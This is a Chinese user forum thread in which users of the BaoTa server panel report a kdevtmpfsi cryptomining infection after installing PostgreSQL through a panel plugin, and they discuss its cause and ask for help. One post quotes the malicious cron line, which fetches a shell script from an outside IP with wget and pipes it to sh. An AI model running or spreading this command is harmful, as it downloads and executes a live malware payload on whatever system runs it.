安装postgresql出现挖矿病毒kdevtmpfsi

宝塔用户_bdiagr 发表于 2024-1-15 05:17:01

使用pg管理器2.2安装数据库，没过多久就中了挖矿病毒

/var/spool/cron 下创建了一个 postgres文件，文件内容如下

* * * * * wget -q -O - http://185.122.204.197/pg.sh | sh > /dev/null 2>&1

罗曼男爵 发表于 2024-1-26 10:41:57

怀疑是postgre用户默认密码导致的,建议官方修复

jovkchan 发表于 2024-3-26 13:56:07

前几天我安装后也出现这个。重做系统了。如何解决这个问题呢。

Crokily 发表于 2024-3-26 20:14:44

去年10月就有用户陆续反馈这个问题了，全都是装了插件后被删库，勒索地址也一致，明确排除用户原因，就是插件被污染了，但今年3月了插件还没下架？？？

宝塔用_5020 发表于 2024-5-22 17:36:52

请问这个问题解决了吗？？阿里云一直提示：挖矿程序，程序来源于/tmp/kdevtmpfsi，执行用户postgres

页: [1]

宝塔面板论坛's Archiver